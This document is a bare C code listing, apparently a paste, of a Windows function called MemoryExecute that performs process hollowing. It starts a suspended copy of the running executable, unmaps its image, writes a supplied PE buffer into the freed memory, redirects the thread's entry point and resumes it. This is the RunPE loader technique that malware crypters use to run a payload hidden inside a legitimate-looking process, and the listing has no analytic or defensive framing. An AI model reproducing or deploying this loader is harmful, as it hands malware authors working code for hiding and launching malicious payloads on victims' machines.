BOOL MemoryExecute(LPBYTE buf, LPWSTR cmd){ PIMAGE_DOS_HEADER pidh = (PIM

1. BOOL MemoryExecute(LPBYTE buf, LPWSTR cmd)
2. {
3.     PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)&buf[0];
4.     PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)&buf[pidh->e_lfanew];
5.     PIMAGE_SECTION_HEADER pish;
6.     PROCESS_INFORMATION pi;
7.     STARTUPINFO si;
8.     CONTEXT ctx;
9.     WCHAR path[MAX_PATH];
10.     WORD s = 0;
11.  
12.     if (!GetModuleFileName(NULL, path, MAX_PATH))
13.   return FALSE;
14.  
15.     RtlZeroMemory(&si, sizeof(STARTUPINFO));
16.     si.cb = sizeof(STARTUPINFO);
17.     ctx.ContextFlags = CONTEXT_FULL;
18.  
19.     if (CreateProcess(path, cmd, NULL, NULL, FALSE, CREATE_SUSPENDED | DETACHED_PROCESS, NULL, NULL, &si, &pi)) {
20.   if (NtUnmapViewOfSection(pi.hProcess, (PVOID)pinh->OptionalHeader.ImageBase) == STATUS_SUCCESS) {
21.     if (NtAllocateVirtualMemory(pi.hProcess, (PVOID *)&pinh->OptionalHeader.ImageBase, 0, &pinh->OptionalHeader.SizeOfImage,
22.     MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == STATUS_SUCCESS) {
23.     NtWriteVirtualMemory(pi.hProcess, (PVOID)pinh->OptionalHeader.ImageBase, &buf[0],
24.     pinh->OptionalHeader.SizeOfHeaders, NULL);
25.  
26.     while (s < pinh->FileHeader.NumberOfSections) {
27.     pish = (PIMAGE_SECTION_HEADER)&buf[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * s++];
28.  
29.     NtWriteVirtualMemory(pi.hProcess, (PVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress),
30.     &buf[pish->PointerToRawData], pish->SizeOfRawData, NULL);
31.     }
32.  
33.     NtGetContextThread(pi.hThread, &ctx);
34.  
35.     ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
36.  
37.     NtSetContextThread(pi.hThread, &ctx);
38.     NtResumeThread(pi.hThread, NULL);
39.  
40.     CloseHandle(pi.hThread);
41.     CloseHandle(pi.hProcess);
42.  
43.     return TRUE;
44.     }
45.   }
46.     }
47.  
48.     return FALSE;
49. }
50.